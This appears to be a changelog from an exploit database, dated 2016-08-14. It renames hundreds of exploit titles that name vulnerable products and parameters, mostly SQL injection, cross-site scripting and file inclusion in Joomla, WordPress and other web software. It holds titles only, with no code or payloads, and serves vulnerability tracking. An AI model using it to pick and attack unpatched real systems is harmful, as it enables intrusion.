DB: 2016-08-14
5 new exploits AWStats (5.0-6.3) Input Validation Hole in 'logfile' AWStats 5.0-6.3 - Input Validation Hole in 'logfile' Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow WorldMail imapd 3.0 SEH Overflow (egg hunter) WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter) e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 fpw.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 news.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - contact.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - download.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - admin.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - fpw.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - news.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 signup.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 submitnews.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - signup.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - submitnews.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - user.php Query String (PATH_INFO) Parameter XSS Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (1) PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection PHP-Nuke Sarkilar Module - 'id' Parameter SQL Injection PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting Kimson CMS 'id' Parameter Cross-Site Scripting Kimson CMS - 'id' Parameter Cross-Site Scripting Ocean12 FAQ Manager Pro 'Keyword' Parameter Cross-Site Scripting Multiple Ocean12 Products 'Admin_ID' Parameter SQL Injection Ocean12 FAQ Manager Pro - 'Keyword' Parameter Cross-Site Scripting Multiple Ocean12 Products - 'Admin_ID' Parameter SQL Injection LinksPro 'OrderDirection' Parameter SQL Injection LinksPro - 'OrderDirection' Parameter SQL Injection PHP-Nuke Downloads Module 'url' Parameter SQL Injection PHP-Nuke Downloads Module - 'url' Parameter SQL Injection PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass PHP 5.2.9 cURL - 'safe_mode' and 'open_basedir' Restriction-Bypass PuterJam\'s Blog PJBlog3 3.0.6 \'action.asp\' SQL Injection PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross-Site Scripting PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting Oracle 10g Secure Enterprise Search 'search_p_groups' Parameter Cross-Site Scripting Oracle 10g Secure Enterprise Search - 'search_p_groups' Parameter Cross-Site Scripting Scriptsez Easy Image Downloader 'id' Parameter Cross-Site Scripting Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities Joomla! CB Resume Builder 'group_id' Parameter SQL Injection X-Cart Email Subscription 'email' Parameter Cross-Site Scripting Joomla! CB Resume Builder - 'group_id' Parameter SQL Injection X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting RunCMS 'forum' Parameter SQL Injection RunCMS - 'forum' Parameter SQL Injection Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection Elxis 'filename' Parameter Directory Traversal Elxis - 'filename' Parameter Directory Traversal Ez Cart 'sid' Parameter Cross-Site Scripting Ez Cart - 'sid' Parameter Cross-Site Scripting Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Inclusion Joomla! iF Portfolio Nexus - 'controller' Parameter Remote File Inclusion Joomla! Jobads 'type' Parameter SQL Injection Joomla! Jobads - 'type' Parameter SQL Injection Jamit Job Board 'post_id' Parameter Cross-Site Scripting Jamit Job Board - 'post_id' Parameter Cross-Site Scripting Tribisur 'cat' Parameter Cross-Site Scripting Tribisur - 'cat' Parameter Cross-Site Scripting Extreme Mobster 'login' Parameter Cross-Site Scripting Extreme Mobster - 'login' Parameter Cross-Site Scripting Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting Subex Nikira Fraud Management System GUI - 'message' Parameter Cross-Site Scripting Softbiz Jobs 'sbad_type' Parameter Cross-Site Scripting Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting HD FLV Player Component for Joomla! 'id' Parameter SQL Injection HD FLV Player Component for Joomla! - 'id' Parameter SQL Injection Spectrum Software WebManager CMS 'pojam' Parameter Cross-Site Scripting Saskia's Shopsystem 'id' Parameter Local File Inclusion Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting Saskia's Shopsystem - 'id' Parameter Local File Inclusion Pars CMS 'RP' Parameter Multiple SQL Injection Pars CMS - 'RP' Parameter Multiple SQL Injection Kasseler CMS News Module 'id' Parameter SQL Injection Kasseler CMS News Module - 'id' Parameter SQL Injection Ziggurat Farsi CMS 'id' Parameter Unspecified Cross-Site Scripting Ziggurat Farsi CMS - 'id' Parameter Unspecified Cross-Site Scripting Vana CMS 'filename' Parameter Remote File Download Vana CMS - 'filename' Parameter Remote File Download Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Ziggurrat Farsi CMS - 'bck' Parameter Directory Traversal Viennabux Beta! 'cat' Parameter SQL Injection Viennabux Beta! - 'cat' Parameter SQL Injection HP System Management Homepage 'RedirectUrl' Parameter URI Redirection HP System Management Homepage - 'RedirectUrl' Parameter URI Redirection Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting Last Wizardz 'id' Parameter SQL Injection Last Wizardz - 'id' Parameter SQL Injection Plesk Server Administrator (PSA) 'locale' Parameter Local File Inclusion Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting KubeSupport 'lang' Parameter SQL Injection KubeSupport - 'lang' Parameter SQL Injection ReCMS 'users_lang' Parameter Directory Traversal ReCMS - 'users_lang' Parameter Directory Traversal jCore 'search' Parameter Cross-Site Scripting jCore - 'search' Parameter Cross-Site Scripting PHP168 Template Editor 'filename' Parameter Directory Traversal PHP168 Template Editor - 'filename' Parameter Directory Traversal uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection SyntaxCMS 'rows_per_page' Parameter SQL Injection Edit-X PHP CMS 'search_text' Parameter Cross-Site Scripting SyntaxCMS - 'rows_per_page' Parameter SQL Injection Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting Nasim Guest Book 'page' Parameter Cross-Site Scripting Nasim Guest Book - 'page' Parameter Cross-Site Scripting FreeSchool 'key_words' Parameter Cross-Site Scripting FreeSchool - 'key_words' Parameter Cross-Site Scripting tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection Spiceworks 'query' Parameter Cross-Site Scripting Spiceworks - 'query' Parameter Cross-Site Scripting NWS-Classifieds 'cmd' Parameter Local File Inclusion NWS-Classifieds - 'cmd' Parameter Local File Inclusion WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting WebAsyst Shop-Script PREMIUM - 'searchstring' Parameter Cross-Site Scripting Web TV 'chn' Parameter Cross-Site Scripting Web TV - 'chn' Parameter Cross-Site Scripting Honest Traffic 'msg' Parameter Cross-Site Scripting Honest Traffic - 'msg' Parameter Cross-Site Scripting PHP Photo Vote 1.3F 'page' Parameter Cross-Site Scripting PHP Photo Vote 1.3F - 'page' Parameter Cross-Site Scripting Wap-motor 'image' Parameter Directory Traversal Wap-motor - 'image' Parameter Directory Traversal QuarkMail 'tf' Parameter Directory Traversal QuarkMail - 'tf' Parameter Directory Traversal Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Microsoft Windows VISTA - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution LES PACKS 'ID' Parameter SQL Injection LES PACKS - 'ID' Parameter SQL Injection PHPShop 2.1 EE 'name_new' Parameter Cross-Site Scripting PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting IBM OmniFind 'command' Parameter Cross-Site Scripting IBM OmniFind - 'command' Parameter Cross-Site Scripting Joomla Store Directory 'id' Parameter SQL Injection Joomla Store Directory - 'id' Parameter SQL Injection PHP State 'id' Parameter SQL Injection Joomla Jeformcr 'id' Parameter SQL Injection JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection PHP State - 'id' Parameter SQL Injection Joomla Jeformcr - 'id' Parameter SQL Injection JExtensions Property Finder Component for Joomla! - 'sf_id' Parameter SQL Injection Social Share 'postid' Parameter SQL Injection Social Share - 'postid' Parameter SQL Injection Openfiler 'device' Parameter Cross-Site Scripting Openfiler - 'device' Parameter Cross-Site Scripting Social Share 'username' Parameter SQL Injection Social Share - 'username' Parameter SQL Injection Social Share 'search' Parameter Cross-Site Scripting HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Social Share - 'search' Parameter Cross-Site Scripting HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection SnapProof 'retPageID' Parameter Cross-Site Scripting SnapProof - 'retPageID' Parameter Cross-Site Scripting VidiScript 'vp' Parameter Cross-Site Scripting VidiScript - 'vp' Parameter Cross-Site Scripting PHP-Fusion 'article_id' Parameter SQL Injection PHP-Fusion - 'article_id' Parameter SQL Injection Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross-Site Scripting RunCMS 'partners' Module 'id' Parameter SQL Injection Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting RunCMS 'partners' Module - 'id' Parameter SQL Injection Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting SyCtel Design 'menu' Parameter Multiple Local File Inclusion SyCtel Design - 'menu' Parameter Multiple Local File Inclusion phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting phpGraphy 0.9.13 b - 'theme_dir' Parameter Cross-Site Scripting Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting Web Auction 0.3.6 - 'lang' Parameter Cross-Site Scripting Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Joomla! 'com_cbcontact' Component - 'contact_id' Parameter SQL Injection Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection Joomla! 'com_maplocator' Component - 'cid' Parameter SQL Injection Tolinet Agencia 'id' Parameter SQL Injection Tolinet Agencia - 'id' Parameter SQL Injection WebFileExplorer 3.6 'user' and 'pass' SQL Injection WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection Sitemagic CMS 'SMTpl' Parameter Directory Traversal Sitemagic CMS - 'SMTpl' Parameter Directory Traversal Nodesforum '_nodesforum_node' Parameter SQL Injection Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Nodesforum - '_nodesforum_node' Parameter SQL Injection Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Inclusion Joomla! 'com_jr_tfb' Component - 'controller' Parameter Local File Inclusion eTAWASOL 'id' Parameter SQL Injection eTAWASOL - 'id' Parameter SQL Injection Prontus CMS 'page' Parameter Cross-Site Scripting ICMusic '1.2 music_id' Parameter SQL Injection Prontus CMS - 'page' Parameter Cross-Site Scripting ICMusic 1.2 - 'music_id' Parameter SQL Injection Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting Easy Estate Rental 's_location' Parameter SQL Injection Joomla Foto Component 'id_categoria' Parameter SQL Injection Easy Estate Rental - 's_location' Parameter SQL Injection Joomla Foto Component - 'id_categoria' Parameter SQL Injection Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Joomla Juicy Gallery Component - 'picId' Parameter SQL Injection Joomla Controller Component 'Itemid' Parameter SQL Injection Joomla Controller Component - 'Itemid' Parameter SQL Injection Synergy Software 'id' Parameter SQL Injection Godly Forums 'id' Parameter SQL Injection Synergy Software - 'id' Parameter SQL Injection Godly Forums - 'id' Parameter SQL Injection MyBB MyTabs Plugin 'tab' Parameter SQL Injection MyBB MyTabs Plugin - 'tab' Parameter SQL Injection mt LinkDatenbank 'b' Parameter Cross-Site Scripting mt LinkDatenbank - 'b' Parameter Cross-Site Scripting Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection Joomla! Slideshow Gallery Component - 'id' Parameter SQL Injection Joomla! 'com_community' Component 'userid' Parameter SQL Injection Joomla! 'com_community' Component - 'userid' Parameter SQL Injection phpWebSite 'page_id' Parameter Cross-Site Scripting phpWebSite - 'page_id' Parameter Cross-Site Scripting Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection VicBlog 'tag' Parameter SQL Injection Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection VicBlog - 'tag' Parameter SQL Injection Kisanji 'gr' Parameter Cross-Site Scripting Kisanji - 'gr' Parameter Cross-Site Scripting Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Joomla! 'com_biitatemplateshop' Component - 'groups' Parameter SQL Injection Vanira CMS 'vtpidshow' Parameter SQL Injection Vanira CMS - 'vtpidshow' Parameter SQL Injection Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Joomla! 'com_expedition' Component - 'id' Parameter SQL Injection Joomla! 'com_tree' Component 'key' Parameter SQL Injection Joomla! 'com_br' Component 'state_id' Parameter SQL Injection Joomla! 'com_shop' Component 'id' Parameter SQL Injection Joomla! 'com_tree' Component - 'key' Parameter SQL Injection Joomla! 'com_br' Component - 'state_id' Parameter SQL Injection Joomla! 'com_shop' Component - 'id' Parameter SQL Injection Splunk 4.1.6 'segment' Parameter Cross-Site Scripting Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting Multiple Cisco Products 'file' Parameter Directory Traversal Multiple Cisco Products - 'file' Parameter Directory Traversal IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting SmartJobBoard 'keywords' Parameter Cross-Site Scripting SmartJobBoard - 'keywords' Parameter Cross-Site Scripting Joomla Content Component 'year' Parameter SQL Injection Joomla Content Component - 'year' Parameter SQL Injection Webistry 1.6 'pid' Parameter SQL Injection Webistry 1.6 - 'pid' Parameter SQL Injection WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting Video Community Portal 'userID' Parameter SQL Injection Video Community Portal - 'userID' Parameter SQL Injection PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting Joomla! 'com_tsonymf' Component - 'idofitem' Parameter SQL Injection Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection Joomla! 'com_caproductprices' Component - 'id' Parameter SQL Injection GraphicsClone Script 'term' parameter Cross-Site Scripting GraphicsClone Script - 'term' parameter Cross-Site Scripting PostNuke pnAddressbook Module 'id' Parameter SQL Injection PostNuke pnAddressbook Module - 'id' Parameter SQL Injection Joomla! 'com_br' Component 'controller' Parameter Local File Inclusion Joomla! 'com_br' Component - 'controller' Parameter Local File Inclusion Joomla! Full 'com_full' Component 'id' Parameter SQL Injection Joomla! Full 'com_full' Component - 'id' Parameter SQL Injection Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Joomla! 'com_boss' Component 'controller' Parameter Local File Inclusion Joomla! 'com_xball' Component - 'team_id' Parameter SQL Injection Joomla! 'com_boss' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_some' Component 'controller' Parameter Local File Inclusion Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Inclusion Joomla! 'com_kp' Component 'controller' Parameter Local File Inclusion Joomla! 'com_some' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_bulkenquery' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_kp' Component - 'controller' Parameter Local File Inclusion Ultimate Locator 'radius' Parameter SQL Injection Joomla! 'com_jesubmit' Component 'index.php' Arbitrary File Upload Ultimate Locator - 'radius' Parameter SQL Injection Joomla! 'com_jesubmit' Component - 'index.php' Arbitrary File Upload Joomla! 'com_motor' Component 'cid' Parameter SQL Injection Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Joomla! 'com_firmy' Component - 'Id' Parameter SQL Injection Joomla! 'com_crhotels' Component 'catid' Parameter SQL Injection Joomla! 'com_propertylab' Component 'id' Parameter SQL Injection Joomla! 'com_crhotels' Component - 'catid' Parameter SQL Injection Joomla! 'com_propertylab' Component - 'id' Parameter SQL Injection Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection Joomla! 'com_cmotour' Component - 'id' Parameter SQL Injection Joomla! 'com_bnf' Component 'seccion_id' Parameter SQL Injection Joomla! 'com_bnf' Component - 'seccion_id' Parameter SQL Injection Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Joomla! Currency Converter Component - 'from' Parameter Cross-Site Scripting RabbitWiki 'title' Parameter Cross-Site Scripting RabbitWiki - 'title' Parameter Cross-Site Scripting Zimbra 'view' Parameter Cross-Site Scripting Zimbra - 'view' Parameter Cross-Site Scripting SMW+ 1.5.6 'target' Parameter HTML Injection SMW+ 1.5.6 - 'target' Parameter HTML Injection ProWiki 'id' Parameter Cross-Site Scripting ProWiki - 'id' Parameter Cross-Site Scripting Tiki Wiki CMS Groupware 'url' Parameter URI Redirection Tiki Wiki CMS Groupware - 'url' Parameter URI Redirection Impulsio CMS 'id' Parameter SQL Injection Impulsio CMS - 'id' Parameter SQL Injection Joomla! X-Shop Component 'idd' Parameter SQL Injection Joomla! X-Shop Component - 'idd' Parameter SQL Injection Joomla! 'com_xvs' Component 'controller' Parameter Local File Inclusion Joomla! 'com_xvs' Component - 'controller' Parameter Local File Inclusion starCMS 'q' Parameter URI Cross-Site Scripting starCMS - 'q' Parameter URI Cross-Site Scripting JPM Article Script 6 'page2' Parameter SQL Injection JPM Article Script 6 - 'page2' Parameter SQL Injection LeKommerce 'id' Parameter SQL Injection LeKommerce - 'id' Parameter SQL Injection Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting XM Forum 'id' Parameter Multiple SQL Injection Uiga FanClub 'p' Parameter SQL Injection XM Forum - 'id' Parameter Multiple SQL Injection Uiga FanClub - 'p' Parameter SQL Injection WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting Ramui Forum Script 'query' Parameter Cross-Site Scripting Ramui Forum Script - 'query' Parameter Cross-Site Scripting GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting LongTail JW Player 'debug' Parameter Cross-Site Scripting LongTail JW Player - 'debug' Parameter Cross-Site Scripting Small-Cms 'hostname' Parameter Remote PHP Code Injection Small-Cms - 'hostname' Parameter Remote PHP Code Injection Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities Flogr - 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure e107 Image Gallery Plugin - 'name' Parameter Remote File Disclosure Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Joomla! 'com_szallasok' Component - 'id' Parameter SQL Injection SWFUpload 'movieName' Parameter Cross-Site Scripting SWFUpload - 'movieName' Parameter Cross-Site Scripting WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting WordPress church_admin Plugin 'id' parameter Cross-Site Scripting WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting WordPress church_admin Plugin - 'id' parameter Cross-Site Scripting sflog! 'section' Parameter Local File Inclusion sflog! - 'section' Parameter Local File Inclusion WebsitePanel 'ReturnUrl' Parameter URI Redirection WebsitePanel - 'ReturnUrl' Parameter URI Redirection WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Inclusion web@all 'name' Parameter Cross-Site Scripting WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion web@all - 'name' Parameter Cross-Site Scripting Joomla! 'com_hello' Component 'controller' Parameter Local File Inclusion Joomla! 'com_hello' Component - 'controller' Parameter Local File Inclusion REDAXO 'subpage' Parameter Cross-Site Scripting Joomla Odudeprofile component 'profession' Parameter SQL Injection REDAXO - 'subpage' Parameter Cross-Site Scripting Joomla Odudeprofile component - 'profession' Parameter SQL Injection BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow BarCodeWiz 'BarcodeWiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow JW Player 'playerready' Parameter Cross-Site Scripting eNdonesia 'cid' Parameter SQL Injection JW Player - 'playerready' Parameter Cross-Site Scripting eNdonesia - 'cid' Parameter SQL Injection ntop 'arbfile' Parameter Cross-Site Scripting ntop - 'arbfile' Parameter Cross-Site Scripting Elefant CMS 'id' Parameter Cross-Site Scripting Elefant CMS - 'id' Parameter Cross-Site Scripting YT-Videos Script 'id' Parameter SQL Injection YT-Videos Script - 'id' Parameter SQL Injection GetSimple 'path' Parameter Local File Inclusion GetSimple - 'path' Parameter Local File Inclusion LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting JPM Article Blog Script 6 - 'tid' Parameter Cross-Site Scripting KindEditor 'name' Parameter Cross-Site Scripting KindEditor - 'name' Parameter Cross-Site Scripting PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Inclusion PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion JW Player 'logo.link' Parameter Cross-Site Scripting JW Player - 'logo.link' Parameter Cross-Site Scripting PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Inclusion Joomla! Komento Component 'cid' Parameter SQL Injection PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion Joomla! Komento Component - 'cid' Parameter SQL Injection WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure Wiki Web Help 'configpath' Parameter Remote File Inclusion Wiki Web Help - 'configpath' Parameter Remote File Inclusion LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting LiteSpeed Web Server - 'gtitle' parameter Cross-Site Scripting WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting FBDj 'id' Parameter SQL Injection FBDj - 'id' Parameter SQL Injection vBSEO 'u' parameter Cross-Site Scripting vBSEO - 'u' parameter Cross-Site Scripting WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Inclusion WordPress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion TAGWORX.CMS 'cid' Parameter SQL Injection TAGWORX.CMS - 'cid' Parameter SQL Injection WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting Open Realty 'select_users_lang' Parameter Local File Inclusion Open Realty - 'select_users_lang' Parameter Local File Inclusion FirePass 7.0 SSL VPN 'refreshURL' Parameter URI Redirection FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection SMF 'view' Parameter Cross-Site Scripting SMF - 'view' Parameter Cross-Site Scripting Gramophone 'rs' Parameter Cross-Site Scripting Gramophone - 'rs' Parameter Cross-Site Scripting Joomla! com_parcoauto Component 'idVeicolo' Parameter SQL Injection Joomla! com_parcoauto Component - 'idVeicolo' Parameter SQL Injection OrangeHRM 'sortField' Parameter SQL Injection WordPress FLV Player Plugin 'id' Parameter SQL Injection OrangeHRM - 'sortField' Parameter SQL Injection WordPress FLV Player Plugin - 'id' Parameter SQL Injection WordPress Kakao Theme 'ID' Parameter SQL Injection WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection WordPress Eco-annu Plugin 'eid' Parameter SQL Injection WordPress Kakao Theme - 'ID' Parameter SQL Injection WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection WordPress Tagged Albums Plugin 'id' Parameter SQL Injection WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities Friends in War The FAQ Manager 'question' Parameter SQL Injection Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities Friends in War The FAQ Manager - 'question' Parameter SQL Injection openSIS 'modname' Parameter Local File Inclusion openSIS - 'modname' Parameter Local File Inclusion WordPress Madebymilk Theme 'id' Parameter SQL Injection WordPress Madebymilk Theme - 'id' Parameter SQL Injection WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload WordPress Webplayer Plugin 'id' Parameter SQL Injection WordPress Plg Novana Plugin 'id' Parameter SQL Injection WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload WordPress Webplayer Plugin - 'id' Parameter SQL Injection WordPress Plg Novana Plugin - 'id' Parameter SQL Injection WordPress Magazine Basic Theme 'id' Parameter SQL Injection WordPress Magazine Basic Theme - 'id' Parameter SQL Injection WordPress Ads Box Plugin 'count' Parameter SQL Injection WordPress Ads Box Plugin - 'count' Parameter SQL Injection Forescout CounterACT 'a' Parameter Open Redirection WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Forescout CounterACT - 'a' Parameter Open Redirection WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection WordPress Toolbox Theme 'mls' Parameter SQL Injection Elastix 'page' Parameter Cross-Site Scripting TinyMCPUK 'test' Parameter Cross-Site Scripting WordPress Toolbox Theme - 'mls' Parameter SQL Injection Elastix - 'page' Parameter Cross-Site Scripting TinyMCPUK - 'test' Parameter Cross-Site Scripting WordPress Zingiri Forums Plugin 'language' Parameter Local File Inclusion WordPress Nest Theme 'codigo' Parameter SQL Injection Sourcefabric Newscoop 'f_email' Parameter SQL Injection WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion WordPress Nest Theme - 'codigo' Parameter SQL Injection Sourcefabric Newscoop - 'f_email' Parameter SQL Injection FOOT Gestion 'id' Parameter SQL Injection FOOT Gestion - 'id' Parameter SQL Injection PHP Address Book 'group' Parameter Cross-Site Scripting PHP Address Book - 'group' Parameter Cross-Site Scripting Joomla! ZT Autolinks Component 'controller' Parameter Local File Inclusion Joomla! Bit Component 'controller' Parameter Local File Inclusion Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion Joomla! Bit Component - 'controller' Parameter Local File Inclusion MyBB Transactions Plugin 'transaction' Parameter SQL Injection MyBB Transactions Plugin - 'transaction' Parameter SQL Injection WHM 'filtername' Parameter Cross-Site Scripting WHM - 'filtername' Parameter Cross-Site Scripting Havalite CMS 'comment' Parameter HTML Injection Havalite CMS - 'comment' Parameter HTML Injection WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access WordPress Gallery Plugin - 'filename_1' Parameter Remote Arbitrary File Access phpLiteAdmin 'table' Parameter SQL Injection IP.Gallery 'img' Parameter SQL Injection phpLiteAdmin - 'table' Parameter SQL Injection IP.Gallery - 'img' 